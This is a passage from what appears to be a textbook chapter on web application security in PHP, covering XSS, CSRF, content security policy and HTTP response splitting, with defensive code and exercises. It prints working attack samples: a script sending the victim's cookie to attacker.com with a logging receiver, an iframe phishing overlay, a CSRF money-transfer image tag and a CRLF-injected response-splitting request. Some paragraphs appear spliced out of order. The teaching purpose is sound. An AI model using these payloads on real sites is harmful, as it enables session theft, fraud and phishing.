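        return null; // the request already arrived over SSL
    }
    return 'https://' . $host . ($server['REQUEST_URI'] ?? '/');
}

// Possible use at the top of every page that belongs to the session:
// $target = httpsRedirectTarget($_SERVER, 'www.server.com');
// if ($target !== null) { header('Location: ' . $target, true, 301); exit; }
```

A redirect alone does not stop the browser from sending the cookie in the first unencrypted request. The php.ini directive session.cookie_secure = 1 tells the browser to send the session cookie over encrypted connections only.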
and Flash. Still, the description below will focus on JavaScript. There are
many different variants of XSS and they are typically divided into non-persistent
and persistent cross-site scripting attacks. Both take advantage of insufficient
validation of data supplied by users to the web server.
2. The victim visits the website and gets presented with the information
provided by the attacker, including the JavaScript.
3. The victim’s browser executes the script and sends the victim’s cookie to
the attacker.
4. The attacker can use the cookie to authenticate as the victim to the server.
The injected script can be as follows.
<script>
document.location = 'http://www.attacker.com/recCookie.php?text='
    + document.cookie;
</script>
This will redirect the browser to a server controlled by the attacker, downloading
the document recCookie.php, and sending the cookie in the query string of the
GET request. The name of the submitted parameter is text. The cookie will
be a session cookie that the victim has received from www.server.com. The
recCookie.php on the attacker’s server can be a simple document storing the
cookie to a file.
<?php
$fp = fopen("c.txt", "w");
fprintf($fp, "%s", $_GET['text']);
fclose($fp);
header("Location: http://www.server.com"); // redirect
?>
To hide the cookie theft, the browser can be redirected back. Another variant
of an XSS attack is to replace the content of the webpage.
<script>
document.body.innerHTML =
    '<iframe src="http://www.attacker.com" ' +
    'width="100%" height="100%" frameborder="0"></iframe>';
</script>
This code will replace the HTML with another webpage. As the address bar
will contain the address of the original webpage (www.server.com), this could
be very effective in e.g., a phishing attack.
• '<' is translated to '&lt;'
• '>' is translated to '&gt;'
• '&' is translated to '&amp;'
• '"' is translated to '&quot;'
Using the argument ENT_QUOTES, single quotes are also translated (to '&#039;').
The function htmlentities() is similar but additionally translates all other
characters that can be expressed as an entity in HTML. An alternative is to
use the function strip_tags() which simply removes all HTML and PHP tags
from a string.
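As a minimal sketch of output escaping, the hypothetical wrapper escapeHtml() below calls htmlspecialchars() with ENT_QUOTES, so that both kinds of quotes are translated. The wrapper name and the sample comment are assumptions made for the illustration.

```php
<?php
// Escape untrusted text before placing it in an HTML page.
function escapeHtml(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

$comment = '<script>alert("x")</script>';
echo escapeHtml($comment), "\n";
// strip_tags() instead removes the tags and keeps only the text between them.
echo strip_tags('<b>bold</b> text'), "\n";
```

The escaped string is displayed by the browser as text and is not interpreted as a script element.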
When cookies are stolen using the XSS attack, they are accessed using
JavaScript and document.cookie. If JavaScript is not used by the webpage to
access cookies, the session management cookie can be declared as “HttpOnly”.
GET / HTTP/1.1
host: www.server.com
...
Set-Cookie: PHPSESSID=j8if9j4kbttk77s5h7vv9vnfp2; path=/; HttpOnly
...
Then, the browser will not allow access to the cookie using JavaScript. Sup-
port for this must be implemented in the browser, which is the case in modern
browsers. In PHP, the cookies can be set as HttpOnly using the php.ini directive
session.cookie_httponly = 1, but it can also be given as an argument
to setcookie(). However, the default behaviour is to allow JavaScript to access
cookies. Clearly, this protection is solely focused on cookie stealing, and
attempts to limit the damage that can be done when the web page is vulnerable
to XSS attacks. The content security policy is a much more general and robust
way of protecting against these attacks.
The information is sent in an HTTP header named Content-Security-Policy.
However, some experimental implementations instead choose to use the alter-
native X-Content-Security-Policy or X-WebKit-CSP headers.
The information given in the header consists of a directive name and a
directive value. The name controls what to be restricted and the value gives
the actual restrictions. The following are some examples of directive names and
their meanings.
The values can be domains that host the resources, but there are also some special
values that can be used. The 'self' value is used to restrict sources to the
origin the document was fetched from. The 'unsafe-inline' value represents
content that is provided inline in the document and not referred to using a
src attribute. This applies to scripts and stylesheets. When CSP is used, the
client will automatically ignore all scripts and stylesheets that are given inline,
unless the web server explicitly allows them. Allowing inline scripts will not
provide any protection against XSS attacks though. The 'unsafe-eval' value is
used to allow dynamic code evaluation, which is by default not allowed when
CSP is used. The 'none' value does not match anything and thus forbids the
corresponding content altogether.
If all sources used by a webpage reside in the same origin, the following
header should be sent.
Content-Security-Policy: default-src 'self'; object-src 'none';
script-src *.example.com;
img-src images.example.com;
The header can be set in the .htaccess file and will apply to all documents that
the .htaccess file applies to.
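The header can also be sent from a PHP script using header(). The sketch below assembles the header line from directive names and values. The helper buildCspHeader() is a hypothetical name introduced here, and the policy is the example policy from above.

```php
<?php
// Build a Content-Security-Policy header line from directive => sources pairs.
function buildCspHeader(array $directives): string
{
    $parts = [];
    foreach ($directives as $name => $sources) {
        $parts[] = $name . ' ' . implode(' ', $sources);
    }
    return 'Content-Security-Policy: ' . implode('; ', $parts);
}

$policy = buildCspHeader([
    'default-src' => ["'self'"],
    'object-src'  => ["'none'"],
    'script-src'  => ['*.example.com'],
    'img-src'     => ['images.example.com'],
]);
echo $policy, "\n";
// In a web request, send it before any output: header($policy);
```

Keeping the policy in an array makes it easier to vary single directives between pages, which a site-wide .htaccess rule does not allow as directly.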
In order to create a useful request in step 1, the attacker examines how
requests are handled on the vulnerable server. Assume, as an example, that
the vulnerable server is a bank. When transferring money from one account to
another, a POST request is used.
toClear=6352&toAcc=46718259&amount=1000
The above request will transfer SEK 1000 to a specified account and clearing
number. Note that, if the PHP superglobal variable $_REQUEST is used to read
the data, then the data can just as well be sent in a GET request.
<img src="...action.php?toClear=8362&toAcc=83712539&amount=1000">
The result is that the website will contain a broken link, but the request will
still be made to the vulnerable server. If the victim is logged into the bank when
visiting the attacker’s website, the cookie will be sent with the request and the
money transfer will be made.
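The GET variant of the attack only works when the server reads its parameters from $_REQUEST. A minimal sketch of a handler that accepts the transfer from POST data only is given below. The function readTransfer() is a hypothetical name, and its arguments stand in for $_SERVER['REQUEST_METHOD'] and $_POST.

```php
<?php
// Read the transfer parameters from POST data only.
// $method and $post stand in for $_SERVER['REQUEST_METHOD'] and $_POST.
function readTransfer(string $method, array $post): ?array
{
    if ($method !== 'POST') {
        return null; // e.g. the GET request triggered by an <img> tag
    }
    foreach (['toClear', 'toAcc', 'amount'] as $field) {
        if (!isset($post[$field]) || !is_string($post[$field])
            || !ctype_digit($post[$field])) {
            return null; // missing or non-numeric field
        }
    }
    return [
        'toClear' => $post['toClear'],
        'toAcc'   => $post['toAcc'],
        'amount'  => (int) $post['amount'],
    ];
}
```

This stops only the image-based request. An attacker can still make the victim's browser submit a hidden form using POST, so this check does not replace the other protections against the attack.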
Another protection is to check the referer header. When a request is made,
the browser attaches a referer header containing the URL from which the request
was made. The server can check that the request was made from the same
(or a whitelisted) site. This protection relies on the browser actually sending
the header, which is not always the case. This calls for a design decision. In lenient
referer validation, the server also accepts the request if there is no header,
while in strict referer validation, the request is denied. In [1], it was
observed that the referer header was suppressed in about 3%-11% of all HTTP
requests, but was much less often suppressed in HTTPS requests (0.05%-0.22%).
Thus, strict referer validation is a feasible counter measure if an SSL connection
is used. A potential problem is that security vulnerabilities in browsers could
make it possible for an attacker to spoof the header.
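The difference between lenient and strict validation can be sketched as a single function. The name refererAllowed() and its parameters are assumptions for this illustration. $referer stands in for $_SERVER['HTTP_REFERER'] and is null when the browser sent no header.

```php
<?php
// Decide whether a request passes referer validation.
function refererAllowed(?string $referer, array $allowedHosts, bool $strict): bool
{
    if ($referer === null || $referer === '') {
        return !$strict; // lenient: accept, strict: deny
    }
    $host = parse_url($referer, PHP_URL_HOST);
    if (!is_string($host)) {
        return false; // malformed URL
    }
    // Compare the whole host name, so that www.server.com.attacker.com fails.
    return in_array(strtolower($host), $allowedHosts, true);
}

var_dump(refererAllowed('https://www.server.com/form.php', ['www.server.com'], true));
var_dump(refererAllowed(null, ['www.server.com'], true));  // strict validation
var_dump(refererAllowed(null, ['www.server.com'], false)); // lenient validation
```

The host is compared as a whole string rather than by substring matching, since a substring test would accept attacker-controlled host names that merely contain the legitimate name.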
One other common solution is to use a secret validation token. The idea is
that the request must contain some value that is not accessible to the attacker.
The session ID is one such value. As the attacker’s website and the target
website belong to different origins, a script on the attacker’s website will not be
able to access the cookie information. Remember that the attack relies on the
user (browser) sending the cookie automatically in all requests. Making sure
that the session ID is sent as data in all requests, the server knows that the
request comes from a legitimate source. Instead of using the session ID, random
tokens can just as well be used. This type of protection is very common.
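A random validation token can be sketched as follows. The function names and the key csrf_token are hypothetical, and the array $session stands in for $_SESSION so that the example runs outside a web server.

```php
<?php
// Return the per-session token, creating it on first use.
function csrfToken(array &$session): string
{
    if (!isset($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Check the token submitted as request data against the stored one.
function csrfTokenValid(array $session, ?string $submitted): bool
{
    return isset($session['csrf_token'])
        && is_string($submitted)
        && hash_equals($session['csrf_token'], $submitted);
}

$session = [];
$token = csrfToken($session);
// The form would carry the token in a hidden field, e.g. named "token".
var_dump(csrfTokenValid($session, $token));    // legitimate request
var_dump(csrfTokenValid($session, 'guessed')); // forged request
```

The comparison uses hash_equals(), which takes the same time regardless of where the two strings differ, so the check itself does not leak information about the token.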
The server can also demand reauthentication before certain requests are
made, e.g., when important settings are changed. Using a CAPTCHA is a
similar solution which verifies that a human is authorizing the request and it is
not made automatically by e.g., a JavaScript.
Users can also protect themselves from this attack. The attack requires that
users are logged in to one website (the target), while visiting another (the at-
tacker’s website). By always making sure to log out, thereby ending the session
and deleting the cookie, the requests will not contain a session cookie. Unfor-
tunately, for convenience, many websites use persistent cookies, allowing users
to stay logged in even after shutting down and restarting the browser. This
requires the users to explicitly log out.
by a newline, and a new HTTP response starts on a new line, it is possible for an
attacker to control the headers of an HTTP response and also to create a second
response. A thorough overview of HTTP response splitting is given in [4].
There are two typical situations when user supplied data is used in HTTP
responses, namely in a redirection using the location header and when setting
a value in a new cookie. This overview will consider the former. Suppose that
some input controlled by the user is used to redirect a webpage to another page,
e.g., the user has the option to change the language on the webpage. If the
default language is English, then Swedish can be chosen using a redirect from
redirect.php below.
$lang = $_GET['lang']; // user controlled and not validated
header("Location: http://www.example.com/index_lang.php?lang=$lang");
Since the language can be sent as a parameter in a GET request, an attacker
can control it. The location header will be present in the HTTP response so the
response can also be controlled. In the attack, the response is manipulated such
that a new HTTP response is constructed. Assume that the $lang variable is
specially crafted and that the request (Req1) is as follows:
GET /redirect.php?lang=swedish%0d%0aContent-Length:%200%0d%0a
%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Length:%2032%0d%0a%0d%0a
<html>AttackerCraftedPage</html> HTTP/1.1
Host: www.example.com
...
...
Then, when the redirect HTTP response is sent to the user agent, it will look
like two different responses.
HTTP/1.1 200 OK
Content-Length: 32
<html>AttackerCraftedPage</html>
Thus, the conclusion so far is that the attacker has the ability to create two re-
sponses by embedding his own code into the location header. The first response
can only be partially controlled by the attacker. However, he has full control
over everything in the second response. Still, this does not constitute much of
an attack since both responses are sent back to his own user-agent. In order to
turn this into something useful (for the attacker), it must be noted that only
one request has been sent, but two responses have been returned. The second
response does not correspond to any request. To fix this, the attacker sends a
new request (Req2) immediately after the first request is sent.
Figure 1: An example of the HTTP communication in an HTTP response splitting
attack.
1. The attacker sends the two HTTP requests to the server, via the proxy.
2. The proxy forwards the requests to the server.
3. The server responds with two responses, but the first response is subject
to the attack and will be interpreted as two responses in itself. Thus, the
proxy will see them as three responses.
4. Since the proxy got two requests from the attacker, it will forward the first
two responses sent from the server. The proxy also caches these responses
to avoid forwarding the same request in the (near) future.
5. Some time later, the victim will request /index.html.
6. Since the response to this request is in the proxy’s cache, it will return
this response without contacting the server.
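The pairing of requests and responses in steps 3 and 4 can be illustrated with a toy model of the proxy. The function pairAndCache() is a hypothetical simplification that matches the i-th parsed response with the i-th forwarded request. Real proxies differ in detail, and the response strings are placeholders.

```php
<?php
// Toy model of a caching proxy (hypothetical; real proxies differ in detail).
function pairAndCache(array $requests, array $parsedResponses): array
{
    $cache = [];
    foreach ($requests as $i => $url) {
        if (isset($parsedResponses[$i])) {
            $cache[$url] = $parsedResponses[$i];
        }
    }
    return $cache;
}

$requests = ['/redirect.php?lang=...', '/index.html']; // Req1 and Req2
$parsedResponses = [
    'redirect (partially attacker controlled)', // first part of the split response
    '<html>AttackerCraftedPage</html>',         // second part, fully attacker controlled
    'genuine /index.html from the server',      // real answer to Req2, left unmatched
];
$cache = pairAndCache($requests, $parsedResponses);
echo $cache['/index.html'], "\n"; // what the victim later receives in step 6
```

The genuine answer to Req2 is the third response and is never matched to a request, which is why the attacker-crafted page ends up in the cache under /index.html.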
The payload in the attacker-crafted response can be anything. It can be e.g.,
a phishing attempt where the attacker tries to mimic another page, a JavaScript
that steals the user's session cookie (an XSS attack), a defacement resulting in
a DoS attack, or anything else.
It must be noted that Figure 1 and the above summary only serve as an
illustrating example of the attack. Depending on the proxy that is used, and
also the attack scenario and environment, the steps may have to be adjusted.
One additional step that can be added in the very beginning is to make sure
that the proxy’s cache is flushed and does not contain the response to the second
request. More details on practical aspects can be found in [4].
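To see why the crafted parameter splits the response, it helps to decode it the way PHP does before the value reaches the script. The sketch below also shows one possible guard, an allowlist of languages. The function safeLanguage() and the values english and swedish are assumptions based on the example above. Current PHP versions additionally refuse to send a header() value that contains a newline.

```php
<?php
// Decode the crafted parameter the way PHP does before filling $_GET.
$crafted = 'swedish%0d%0aContent-Length:%200%0d%0a%0d%0a'
         . 'HTTP/1.1%20200%20OK%0d%0aContent-Length:%2032%0d%0a%0d%0a'
         . '<html>AttackerCraftedPage</html>';
$lang = urldecode($crafted);

// Each CR LF pair ends one line, so the single value spans several lines.
$lines = explode("\r\n", $lang);
echo count($lines), " lines\n";

// Allow only known languages and fall back to the default otherwise.
function safeLanguage(string $lang): string
{
    $allowed = ['english', 'swedish'];
    return in_array($lang, $allowed, true) ? $lang : 'english';
}

echo safeLanguage($lang), "\n";     // the crafted value is rejected
echo safeLanguage('swedish'), "\n"; // a legitimate value is kept
```

An allowlist is used here instead of stripping CR and LF characters, since the set of valid languages is small and known in advance.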
Exercises
Exercise 301 Assume that some files included by the function include() are
hosted by your grandparents’ webserver. Thus the option allow_url_include
must be set to on. Moreover, the filenames are submitted to your script using
GET. Explain how you would protect your webpage against remote file inclusion
from a malicious user.
Exercise 302 What are prepared statements and why should they be used in
SQL queries?
Exercise 303 There are mainly three ways to bypass the same-origin policy.
Compare them in terms of how clients and servers must actively take part in
the bypassing technique.
Exercise 304 Consider the following simplification of the CORS protocol: The
user-agent sends the cross-domain request indicating which domain is making
the request. If the request is allowed, then the cross-domain server can just
send back the data, and if it is not allowed it refuses. Thus, the
Access-Control-Allow-Origin header in the response is not used. What would be
the problem with this simplification, i.e., removing the
Access-Control-Allow-Origin header from responses?
Exercise 305 Can SSL help protect your website against cross site scripting
vulnerabilities?
Exercise 306 The following code can be considered quite generic for receiving
information in a form to the same webpage that is displaying the form:
<form action="<?php echo $_SERVER['PHP_SELF']; ?>">
<input type="text" name="the_text" />
<input type="submit" value="Submit text" />
</form>
Assume that the webpage containing the form is located at www.server.com/index.php.
Then $_SERVER['PHP_SELF'] should contain /index.php. But what if you visit
the webpage with the URL
www.server.com/index.php/"><script>alert('Hello')</script><e
What happens and why? Clearly, the form should not be constructed this way.
How should it be made instead?
Exercise 307 How can users protect themselves against XSS attacks?
Exercise 308 How can web applications protect themselves against CSRF at-
tacks?
Exercise 309 A possible protection against CSRF attacks (on the user side)
is to not send any cookies in cross-domain POST requests, i.e., requests that
are sent to a domain which did not host the form or the script responsible for
the request. Why would this protect against CSRF attacks? Would it protect
against all CSRF attacks?
Exercise 310 Home DSL routers are commonly used to provide Internet ac-
cess for home users. They also allow several users on a home network to access
Internet using one connection. The fact that many home routers could be com-
promised received much attention in late 2008. A typical default security setting
is to disable WAN administration, i.e., administration from outside the home
network. Only LAN administration is allowed. Since only computers inside the
home network can access the configuration menu of the router, another typical
default setting is to allow administration without a password. In other words,
computers on the home network are considered trusted. It is possible to enable
WAN administration and set a password for accessing the router from outside
the home network. The setting can be set in one of the configuration menus.
The setting is enabled by the HTTP request
Password=secret&EnableWANAdminAccess=on
In some cases it turned out that GET requests could be used as well. The at-
tacker’s goal is to enable remote administration and choose the password. After
that, the attacker can control all network traffic leaving the router by e.g., chang-
ing the DNS used.
a) Describe a CSRF attack on this setting. Under what circumstances will
the attack work?
b) To improve security, basic or digest access authentication with a well-
chosen password can be used to protect the router. Describe a CSRF attack
on this setting. Under what circumstances will the attack work?
c) An alternative to HTTP authentication is to use web based login. Describe
a CSRF attack on this setting. Under what circumstances will the attack
work?
References
[1] A. Barth, C. Jackson, and J. C. Mitchell. Robust defenses for cross-site
request forgery. In Proceedings of the 15th ACM conference on Computer
and communications security, CCS ’08, pages 75–88. ACM, 2008.
[2] D. Crockford. The application/json Media Type for JavaScript Object
Notation (JSON). RFC 4627 (Informational), July 2006. Available at:
http://www.ietf.org/rfc/rfc4627.txt.
[3] M. Cross. Developer’s guide to web application security. Syngress, 2007.
[4] A. Klein. “Divide and Conquer”: HTTP Response Splitting, Web
Cache Poisoning Attacks, and Related Topics, 2004. Available at:
http://dl.packetstormsecurity.net/papers/general/whitepaper_httpresponse.pdf.
[5] D. Stuttard and M. Pinto. The Web Application Hacker’s Handbook: Dis-
covering and Exploiting Security Flaws. Wiley, 2007.
[6] W3C. Cross-origin resource sharing. Available at:
http://dev.w3.org/2006/waf/access-control/, 2010.
[7] W3Schools.com. HTML DOM Tutorial. Available at:
http://www.w3schools.com/htmldom/.
[8] M. Zalewski. Browser security handbook, part 2. Available at:
http://code.google.com/p/browsersec/wiki/Part2, 2008, 2009.